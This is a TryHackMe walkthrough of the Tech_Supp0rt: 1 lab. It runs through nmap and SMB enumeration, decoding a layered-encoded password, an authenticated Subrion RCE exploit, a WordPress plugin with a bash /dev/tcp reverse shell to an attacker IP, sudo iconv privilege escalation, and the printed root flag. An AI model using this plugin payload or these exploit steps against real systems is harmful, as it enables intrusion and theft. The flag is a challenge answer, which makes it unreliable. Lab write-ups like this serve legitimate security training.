Tryhackme - Tech_Supp0rt: 1


In this walkthrough, we will be going through the Tech_Supp0rt: 1 room from TryHackMe. It is an Easy-rated room, and the objective is to hack into the scammers' under-development website to foil their plans. So, let's get started without any delay.


Machine Info:

Title: Tech_Supp0rt: 1
IP address: 10.10.112.144
Difficulty: Easy
Objective: Hack into the scammer's under-development website to foil their plans.

Enumeration:

  • I started off with a regular nmap scan and found four open ports: 22 (SSH), 80 (HTTP), and 139 and 445 (SMB).

sudo nmap -sS -sV 10.10.112.144

nmap scan

  • Next, ran gobuster against the web server on port 80 and found two interesting directories, /test and /wordpress. The scan also turned up /phpinfo.php, which exposes the full PHP configuration of the host.

wh1terose@fsociety:~$ gobuster dir -u http://10.10.112.144/ -w ~/Desktop/Wordlist/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.112.144/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/11/19 11:21:36 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/index.html           (Status: 200) [Size: 11321]
/phpinfo.php          (Status: 200) [Size: 94941]
/server-status        (Status: 403) [Size: 278]  
/test                 (Status: 301) [Size: 313] [--> http://10.10.112.144/test/]
/wordpress            (Status: 301) [Size: 318] [--> http://10.10.112.144/wordpress/]
                                                                                                                                       
===============================================================
2023/11/19 11:23:44 Finished
===============================================================

gobuster scan

  • The /test directory served a page full of the fake-alert pop-ups that scammers use to pressure their victims. This looks like a test page for that scam.

Scam popups

  • Looking into the /wordpress directory reveals a WordPress installation. I enumerated it thoroughly but could not find anything useful on the front end.

Wordpress installation

  • Next, used wpscan to enumerate usernames and got a hit for one: support.

wpscan --url http://10.10.112.144/wordpress/ -e u

Wpscan result

  • I didn't find anything juicy on the WordPress side: no known exploits for the theme, and no vulnerable or misconfigured plugins. So I started enumerating the SMB shares. Used smbclient and smbmap to list the shares and found read access on the websvr share.

smbclient -L //10.10.112.144 -N

smbclient list

smbmap -H 10.10.112.144

smbmap list

  • Using an SMB null session (no credentials), downloaded the enter.txt file from the websvr share. It contains credentials for a Subrion installation. We still had no WordPress credentials, so that route stayed closed for now.

smbclient //10.10.112.144/websvr -N

enter.txt

  • The password in enter.txt is not plaintext; the note says it was "cooked with a magical formula". Decoding the string with CyberChef (Magic finds the recipe: From Base58, then From Base32, then From Base64) reveals the password Scam2021. This is layered encoding, not encryption, so anyone who can read the share can recover it.

admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk
admin:Scam2021

Decode the admin password
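The same decoding done without CyberChef, as an added example that is not part of the original walkthrough. The three layers are Base58 (the Bitcoin alphabet CyberChef uses) over Base32 over Base64, so undoing the "magical formula" is three decodes in reverse order. The helper names `cook()` and `uncook()` are mine; only the cooked string and the result Scam2021 come from the page.

```python
import base64

# Bitcoin-style Base58 alphabet (no 0, O, I, l), the one CyberChef's Base58 operation uses.
B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def b58decode(text: str) -> bytes:
    """Decode Base58 text to bytes; each leading '1' becomes a leading zero byte."""
    n = 0
    for ch in text:
        n = n * 58 + B58_ALPHABET.index(ch)  # ValueError on a non-Base58 character
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    leading_zeros = len(text) - len(text.lstrip("1"))
    return b"\x00" * leading_zeros + body


def b58encode(data: bytes) -> str:
    """Encode bytes as Base58; leading zero bytes become leading '1's."""
    n = int.from_bytes(data, "big")
    out = ""
    while n:
        n, rem = divmod(n, 58)
        out = B58_ALPHABET[rem] + out
    leading_zeros = len(data) - len(data.lstrip(b"\x00"))
    return "1" * leading_zeros + out


def uncook(cooked: str) -> str:
    """Reverse the 'magical formula': Base58 -> Base32 -> Base64 -> plaintext."""
    step1 = b58decode(cooked)        # Base58 decode yields Base32 text (bytes)
    step2 = base64.b32decode(step1)  # Base32 decode yields Base64 text (bytes)
    return base64.b64decode(step2).decode()


def cook(plain: str) -> str:
    """Apply the same layers forward, to confirm the recipe round-trips."""
    return b58encode(base64.b32encode(base64.b64encode(plain.encode())))


if __name__ == "__main__":
    # Cooked admin password taken from enter.txt on the box.
    print(uncook("7sKvntXdPEJaxazce9PXi24zaFrLiKWCk"))  # Scam2021
```

`base64.b32decode` insists on the `=` padding that the intermediate layer carries, which is why the Base32 stage has to come before Base64 and not the other way round; a wrong layer order raises a decoding error rather than producing garbage, which is a quick way to confirm a guessed recipe.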

  • I looked online for Subrion and found that it is a CMS used to build different kinds of web apps. Browsing to /subrion did not work. The goals written in enter.txt say that if the installation cannot be reached at its default path, it should be reached through its panel. The path below gave a login page.

http://10.10.112.144/subrion/panel/

Subrion Admin Panel

  • Logged into the dashboard using the found credentials. The Subrion version running is 4.2.1.

Subrion Dashboard

  • Checked that version for known exploits and found it vulnerable to an authenticated arbitrary file upload that gives remote code execution (Exploit-DB 49876). Authenticated is the key word: the exploit needs the admin credentials we just recovered.

searchsploit Subrion CMS 4.2.1

searchsploit exploit search

searchsploit -m php/webapps/49876.py

searchsploit exploit search

Initial Access:

  • Used the exploit with the Subrion admin credentials to get our initial access.

python3 49876.py -u http://10.10.112.144/subrion/panel/ -l admin -p Scam2021

Subrion Exploit

  • Next, looked into wp-config.php for WordPress credentials and got a combo. Bingo! The file holds the database password, and it turns out to be reused for the WordPress support user.

ls /var/www/html/wordpress

ls /var/www/html/wordpress

cat /var/www/html/wordpress/wp-config.php

MYSQL creds

support:ImAScammerLOL!123!

  • Logged into the wordpress dashboard using the found credentials.

Wordpress dashboard

  • Next, I tried to put our PHP reverse shell into the theme's 404.php through the editor, but saving the file failed. So I took a different route.

404.php

  • I used the PHP code below to build a malicious WordPress plugin. The header comment is what makes WordPress recognise the file as a plugin; once the plugin is activated, the exec() call runs and connects back to my listener.

<?php

/**
Plugin Name: WordPress Reverse shell
Author: Your Mom
**/

// Runs when WordPress loads the plugin file (on activation, and on every request while it stays active).
// Bash TCP reverse shell to the attacker's listener on 10.18.1.78:4444.
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.18.1.78/4444 0>&1'");

?>

  • Zipped it and uploaded it to the target through the WordPress plugin uploader.

zip -u revshell.zip revshell.php

zip the payload

Upload revshell.zip

Install revshell.zip

  • Once activated, I got a connection back to my netcat listener. Great!

netcat listener

  • Switched to the scamsite user with su, using the password found in wp-config.php, which is reused for that account as well.

switch to scamsite

Privilege Escalation:

  • Next, checked for sudo misconfigurations using the command below and found that our user can run the iconv binary as root without a password.

sudo -l

sudo -l

  • Used the GTFOBins sudo entry for iconv to read root.txt and captured our flag. Converting from ISO-8859-1 to ISO-8859-1 is an identity transcode, so iconv simply copies the file to stdout, with root's privileges.

GTFObins sudo

scamsite@TechSupport:/tmp$ LFILE=/root/root.txt
scamsite@TechSupport:/tmp$ sudo /usr/bin/iconv -f 8859_1 -t 8859_1 "$LFILE"
851b8233a8c09400ec30651bd1529bf1ed02790b

root flag
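An added example (not part of the original walkthrough) of turning the `sudo -l` check above into something repeatable: it parses the rules section of `sudo -l` output and flags commands that are unrestricted or have a GTFOBins sudo entry, rating NOPASSWD ones highest. The sample output is constructed to resemble the box, and the GTFOBins set is an illustrative subset; the function names are mine.

```python
import re

# Constructed sample modelled on the TechSupport box; not the page's actual capture.
SAMPLE_SUDO_L = """\
Matching Defaults entries for scamsite on TechSupport:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User scamsite may run the following commands on TechSupport:
    (ALL) NOPASSWD: /usr/bin/iconv
    (root) /usr/bin/apt-get
    (ALL : ALL) ALL
"""

# Binaries with a GTFOBins "sudo" entry (illustrative subset, not the full list).
GTFOBINS_SUDO = {"iconv", "vim", "find", "less", "awk", "python3", "env", "apt-get", "tar"}

# "(runas) TAG: TAG: cmd1, cmd2" as printed by sudo -l; tags are e.g. NOPASSWD:, SETENV:.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_rules(output: str) -> list:
    """Return one dict per command from the 'may run the following commands' section."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True  # everything after this header is a rule line
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.strip(":") for t in m.group("tags").split()}
        for cmd in m.group("cmds").split(","):
            rules.append({
                "runas": m.group("runas").strip(),
                "nopasswd": "NOPASSWD" in tags,
                "command": cmd.strip(),
            })
    return rules


def assess(rules: list) -> list:
    """Map each risky rule to (command, severity, reason)."""
    findings = []
    for r in rules:
        cmd = r["command"]
        if cmd == "ALL":
            findings.append((cmd, "CRITICAL", "unrestricted sudo"))
            continue
        binary = cmd.split()[0].rsplit("/", 1)[-1]  # basename of the allowed executable
        if binary in GTFOBINS_SUDO:
            sev = "HIGH" if r["nopasswd"] else "MEDIUM"
            findings.append((cmd, sev, f"{binary} has a GTFOBins sudo entry (file read or shell)"))
    return findings


if __name__ == "__main__":
    for cmd, sev, why in assess(parse_sudo_rules(SAMPLE_SUDO_L)):
        print(f"{sev:8} {cmd}: {why}")
```

The fix on the defending side is to drop the rule rather than wrap it: any sudo entry for a binary that can read or write arbitrary files is equivalent to root, and `NOPASSWD` only removes the last speed bump.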

Task 1 – Submit Flags

Question 1 – What is the root.txt flag?

Task 1 - Submit Flags


Conclusion:


So that was Tech_Supp0rt: 1 for you. We started off with a regular nmap scan and found four open ports: 22 (SSH), 80 (HTTP), and 139 and 445 (SMB). Next, used gobuster to find hidden directories and got one named wordpress with the CMS installed. Along with that, looked into the SMB shares and got a file named enter.txt containing credentials for the Subrion admin panel. Used those to access the Subrion dashboard, looked for known exploits for the installed Subrion version, found an authenticated RCE, and used it to get initial access on the server. The wp-config.php file revealed the credentials for the WordPress dashboard; once inside, a malicious WordPress plugin gave us a shell, which we upgraded to the scamsite user with the same reused password. At last, escalated our privileges by abusing a sudo misconfiguration on the iconv binary (GTFOBins) and read the root flag, along with my favourite underwear that had been missing for quite some time. On that note, I will take your leave and meet you in the next one. Till then, "Happy hacking".
